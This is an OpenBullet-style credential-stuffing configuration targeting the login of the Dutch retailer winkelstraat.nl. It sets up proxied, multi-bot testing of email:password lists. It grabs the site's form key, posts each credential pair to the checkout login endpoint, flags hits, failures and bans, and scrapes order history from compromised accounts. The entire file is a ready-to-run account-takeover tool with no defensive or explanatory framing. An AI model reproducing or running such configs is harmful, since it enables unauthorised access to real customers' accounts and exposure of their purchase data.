[SETTINGS]
{
  "Name": "Winkelstraat",
  "SuggestedBots": 80,
  "MaxCPM": 0,
  "LastModified": "2020-04-18T15:44:56.6120541+02:00",
  "AdditionalInfo": "Fixed",
  "Author": "Dedrilath",
  "Version": "1.4.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": true,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.winkelstraat.nl/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "xpid:\"" "\"" -> VAR "id" 

REQUEST GET "https://www.winkelstraat.nl/state/index" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "form_key\":\"" "\"" -> VAR "key" 

REQUEST POST "https://www.winkelstraat.nl/onestepcheckout/ajax/login" 
  CONTENT "onestepcheckout_username=<USER>&onestepcheckout_password=<PASS>&form_key=<key>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Host: www.winkelstraat.nl" 
  HEADER "Connection: keep-alive" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "X-NewRelic-ID: <id>" 
  HEADER "Origin: https://www.winkelstraat.nl" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 
  HEADER "Accept: */*" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Referer: https://www.winkelstraat.nl/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "success\":true" 
  KEYCHAIN Failure OR 
    KEY "success\":false" 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "403" 

REQUEST GET "https://www.winkelstraat.nl/sales/order/history" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Referer: https://www.winkelstraat.nl/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

PARSE "<SOURCE>" LR "<span class=\"price\">" "</span> </a>" Recursive=TRUE CreateEmpty=FALSE -> CAP "Bestellingen" 

